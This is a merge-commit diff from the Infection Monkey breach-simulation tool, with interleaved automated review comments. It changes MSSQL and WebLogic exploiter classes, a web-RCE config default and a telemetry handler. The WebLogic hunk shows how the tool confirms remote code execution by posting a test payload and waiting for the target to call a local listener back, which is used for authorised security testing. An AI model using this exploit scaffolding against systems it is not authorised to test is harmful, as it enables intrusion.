Merge remote-tracking branch 'origin/develop' into develop

Daniel Goldberg 2019-01-30 10:33:24 +02:00
commit a3cd142d8c
5 changed files with 50 additions and 26 deletions


@ -21,7 +21,6 @@ class MSSQLExploiter(HostExploiter):
def __init__(self, host): def __init__(self, host):
super(MSSQLExploiter, self).__init__(host) super(MSSQLExploiter, self).__init__(host)
self._config = __import__('config').WormConfiguration
self.attacks_list = [mssqlexec_utils.CmdShellAttack] self.attacks_list = [mssqlexec_utils.CmdShellAttack]
def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH): def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH):


@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
exploit_config['upload_commands'] = None exploit_config['upload_commands'] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"] # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
exploit_config['url_extensions'] = None exploit_config['url_extensions'] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable. # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
exploit_config['stop_checking_urls'] = False exploit_config['stop_checking_urls'] = False
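Review bot: The default for `exploit_config['url_extensions']` changes from None to [], but the comment above that line still only gives an example and does not say how an empty list is treated, while `upload_commands` two lines up keeps None as its "unset" value, so the two keys now use different sentinels with nothing in the hunk explaining why. Suggest extending the comment to `# url_extensions: subdirectories to scan (www.domain.com[/extension]), e.g. ["home", "index.php"]; [] means no extra paths are appended (unlike upload_commands, where None means unset)` — assuming, as the list type suggests, that consumers iterate this value. The enclosing method starts and ends outside the hunk.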


@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading import threading
import logging import logging
import time
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds # How long should be wait after each request in seconds
REQUEST_DELAY = 0.0001
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
def check_if_exploitable(self, url): def add_vulnerable_urls(self, urls, stop_checking=False):
"""
Overrides parent method to use listener server
"""
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server() httpd, lock = self._start_http_server()
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) exploitable = False
for url in urls:
if self.check_if_exploitable_weblogic(url, httpd):
exploitable = True
break
if not exploitable and httpd.get_requests < 1:
# Wait for responses
time.sleep(REQUEST_TIMEOUT)
if httpd.get_requests > 0:
# Add all urls because we don't know which one is vulnerable
self.vulnerable_urls.extend(urls)
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
else:
LOG.info("No vulnerable urls found, skipping.")
self._stop_http_server(httpd, lock)
def check_if_exploitable_weblogic(self, url, httpd):
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error # Our request will not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0 return httpd.get_requests > 0
def _start_http_server(self): def _start_http_server(self):
@ -94,7 +120,8 @@ class WebLogicExploiter(WebRCE):
lock.acquire() lock.acquire()
return httpd, lock return httpd, lock
def _stop_http_server(self, httpd, lock): @staticmethod
def _stop_http_server(httpd, lock):
lock.release() lock.release()
httpd.join(SERVER_TIMEOUT) httpd.join(SERVER_TIMEOUT)
httpd.stop() httpd.stop()
@ -168,8 +195,8 @@ class WebLogicExploiter(WebRCE):
we determine if we can exploit by either getting a GET request from host or not. we determine if we can exploit by either getting a GET request from host or not.
""" """
def __init__(self, local_ip, local_port, lock, max_requests=1): def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip self.local_ip = local_ip
self._local_port = local_port self.local_port = local_port
self.get_requests = 0 self.get_requests = 0
self.max_requests = max_requests self.max_requests = max_requests
self._stopped = False self._stopped = False
@ -184,7 +211,7 @@ class WebLogicExploiter(WebRCE):
LOG.info('Server received a request from vulnerable machine') LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1 self.get_requests += 1
LOG.info('Server waiting for exploited machine request...') LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S) httpd = HTTPServer((self.local_ip, self.local_port), S)
httpd.daemon = True httpd.daemon = True
self.lock.release() self.lock.release()
while not self._stopped and self.get_requests < self.max_requests: while not self._stopped and self.get_requests < self.max_requests:
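Review bot: In check_if_exploitable_weblogic the single-value `timeout=REQUEST_DELAY` (0.0001 s) bounds the TCP connect as well as the read, so on anything but loopback post() will usually raise ConnectTimeout before the request body is even sent; that exception is not caught by the `except exceptions.ReadTimeout` branch, it is logged as "Something went wrong" by the generic handler, and the "will not get response" comment then describes a path that rarely runs. Passing a (connect, read) pair, `post(url, data=payload, headers=HEADERS, timeout=(REQUEST_TIMEOUT, REQUEST_DELAY), verify=False)`, keeps the quick return while giving the connect and the request body time to go out. Two further points in the same hunk: the new `stop_checking=False` parameter of add_vulnerable_urls is never read in its body, so the override silently ignores what the caller asks for and its docstring should at least state that; and `_stop_http_server` is only reached on the normal path, so an exception from get_test_payload (which sits outside the try) leaves the listener thread running and the lock held — the body from `_start_http_server` to `_stop_http_server` belongs in a try/finally. The enclosing class continues outside the hunk.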


@ -1,5 +1,5 @@
To get development versions of Monkey Island and Monkey look into deployment scripts folder. To get development versions of Monkey Island and Monkey look into deployment scripts folder.
If you only want to monkey from scratch you may refer to the instructions below. If you only want to build monkey from scratch you may reference instructions below.
The monkey is composed of three separate parts. The monkey is composed of three separate parts.
* The Infection Monkey itself - PyInstaller compressed python archives * The Infection Monkey itself - PyInstaller compressed python archives


@ -149,8 +149,7 @@ class Telemetry(flask_restful.Resource):
new_scan = \ new_scan = \
{ {
"timestamp": telemetry_json["timestamp"], "timestamp": telemetry_json["timestamp"],
"data": data, "data": data
"scanner": telemetry_json['data']['scanner']
} }
mongo.db.edge.update( mongo.db.edge.update(
{"_id": edge["_id"]}, {"_id": edge["_id"]},
@ -160,7 +159,6 @@ class Telemetry(flask_restful.Resource):
node = mongo.db.node.find_one({"_id": edge["to"]}) node = mongo.db.node.find_one({"_id": edge["to"]})
if node is not None: if node is not None:
if new_scan["scanner"] == "TcpScanner":
scan_os = new_scan["data"]["os"] scan_os = new_scan["data"]["os"]
if "type" in scan_os: if "type" in scan_os:
mongo.db.node.update({"_id": node["_id"]}, mongo.db.node.update({"_id": node["_id"]},
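Review bot: With the `if new_scan["scanner"] == "TcpScanner":` gate removed, `scan_os = new_scan["data"]["os"]` now runs for every scan telemetry, and a scan payload without an "os" key raises KeyError inside the request handler; telemetry_json is supplied by the agent, so the island should not index that schema blindly. Suggest `scan_os = new_scan["data"].get("os", {})` so the existing `if "type" in scan_os` check simply skips such payloads — assuming data is a dict, as the indexing on the same line implies. The enclosing handler method starts and ends outside the hunk.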